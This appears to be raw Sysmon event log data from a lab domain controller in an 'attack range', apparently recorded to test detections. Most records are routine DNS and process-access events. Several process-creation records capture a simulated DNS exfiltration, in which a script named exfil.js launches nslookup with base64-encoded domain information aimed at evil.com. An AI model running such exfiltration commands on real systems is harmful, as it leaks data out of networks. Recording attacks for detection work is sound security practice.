354300x8000000000000000210940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.108{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50841- 354300x8000000000000000210939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.108{00000000-0000-0000-0000-000000000000}2792<unknown process>-udptruefalse127.0.0.1-50841-false127.0.0.1-53domain 354300x8000000000000000210938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.108{00000000-0000-0000-0000-000000000000}2792<unknown process>-udpfalsefalse127.0.0.1-50840-false127.0.0.1-53domain 354300x8000000000000000210937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.108{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50840- 354300x8000000000000000210936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.107{00000000-0000-0000-0000-000000000000}2792<unknown process>-udptruefalse127.0.0.1-50840-false127.0.0.1-53domain 354300x8000000000000000210935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.049{00000000-0000-0000-0000-000000000000}6508<unknown process>-udpfalsefalse127.0.0.1-50839-false127.0.0.1-53domain 354300x8000000000000000210934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.049{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50839- 354300x8000000000000000210933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.049{00000000-0000-0000-0000-000000000000}6508<unknown process>-udptruefalse127.0.0.1-50839-false127.0.0.1-53domain 354300x8000000000000000210932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.049{00000000-0000-0000-0000-000000000000}6508<unknown process>-udpfalsefalse127.0.0.1-50838-false127.0.0.1-53domain 354300x8000000000000000210931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.049{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50838- 354300x8000000000000000210930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.049{00000000-0000-0000-0000-000000000000}6508<unknown process>-udptruefalse127.0.0.1-50838-false127.0.0.1-53domain 354300x8000000000000000210929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.049{00000000-0000-0000-0000-000000000000}6508<unknown process>-udpfalsefalse127.0.0.1-50837-false127.0.0.1-53domain 354300x8000000000000000210928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.049{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50837- 354300x8000000000000000210927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.049{00000000-0000-0000-0000-000000000000}6508<unknown process>-udptruefalse127.0.0.1-50837-false127.0.0.1-53domain 354300x8000000000000000210926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.958{00000000-0000-0000-0000-000000000000}5404<unknown process>-udpfalsefalse127.0.0.1-50836-false127.0.0.1-53domain 354300x8000000000000000210925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.958{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50836- 354300x8000000000000000210924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.958{00000000-0000-0000-0000-000000000000}5404<unknown process>-udptruefalse127.0.0.1-50836-false127.0.0.1-53domain 354300x8000000000000000210923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.958{00000000-0000-0000-0000-000000000000}5404<unknown process>-udpfalsefalse127.0.0.1-50835-false127.0.0.1-53domain 354300x8000000000000000210922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.958{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50835- 354300x8000000000000000210921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.958{00000000-0000-0000-0000-000000000000}5404<unknown process>-udptruefalse127.0.0.1-50835-false127.0.0.1-53domain 354300x8000000000000000210920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.957{00000000-0000-0000-0000-000000000000}5404<unknown process>-udpfalsefalse127.0.0.1-50834-false127.0.0.1-53domain 354300x8000000000000000210919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.957{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50834- 354300x8000000000000000210918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.957{00000000-0000-0000-0000-000000000000}5404<unknown process>-udptruefalse127.0.0.1-50834-false127.0.0.1-53domain 354300x8000000000000000210917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.891{00000000-0000-0000-0000-000000000000}5552<unknown process>-udpfalsefalse127.0.0.1-50833-false127.0.0.1-53domain 354300x8000000000000000210916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.891{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50833- 354300x8000000000000000210915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.891{00000000-0000-0000-0000-000000000000}5552<unknown process>-udptruefalse127.0.0.1-50833-false127.0.0.1-53domain 354300x8000000000000000210914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.891{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50832- 354300x8000000000000000210913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.891{00000000-0000-0000-0000-000000000000}5552<unknown process>-udptruefalse127.0.0.1-50832-false127.0.0.1-53domain 354300x8000000000000000210912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.891{00000000-0000-0000-0000-000000000000}5552<unknown process>-udpfalsefalse127.0.0.1-50831-false127.0.0.1-53domain 354300x8000000000000000210911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.891{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50831- 354300x8000000000000000210910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.891{00000000-0000-0000-0000-000000000000}5552<unknown process>-udptruefalse127.0.0.1-50831-false127.0.0.1-53domain 354300x8000000000000000210909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.811{00000000-0000-0000-0000-000000000000}4860<unknown process>-udpfalsefalse127.0.0.1-50829-false127.0.0.1-53domain 10341000x8000000000000000210908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.197{2E1864BB-18F1-629A-7244-000000005F02}50402620C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-7344-000000005F02}508C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.197{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.197{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.197{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-7344-000000005F02}508C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.197{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.197{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.197{2E1864BB-18F1-629A-7144-000000005F02}48122600C:\Windows\system32\cmd.exe{2E1864BB-18F1-629A-7344-000000005F02}508C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.204{2E1864BB-18F1-629A-7344-000000005F02}508C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F1-629A-7144-000000005F02}4812C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrywy.tmp 2>&1 10341000x8000000000000000210900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.182{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-7244-000000005F02}5040C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.182{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-7244-000000005F02}5040C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.178{2E1864BB-18F1-629A-7244-000000005F02}50402620C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-7144-000000005F02}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.160{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-7244-000000005F02}5040C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.160{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.160{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.160{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.160{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.144{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-7144-000000005F02}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.144{2E1864BB-18E0-629A-6742-000000005F02}39762872C:\Windows\System32\WScript.exe{2E1864BB-18F1-629A-7144-000000005F02}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.159{2E1864BB-18F1-629A-7144-000000005F02}4812C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrywy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.144{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbnfx.tmpMD5=0E5FCD35CD053EF552028604630DF807,SHA256=10CB74BA0B52EDCD250F65D3C712B6E8DE326D18DDB63A8E97ADD31848C9E0E2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.113{2E1864BB-18F1-629A-6F44-000000005F02}12762864C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-7044-000000005F02}7488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.113{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 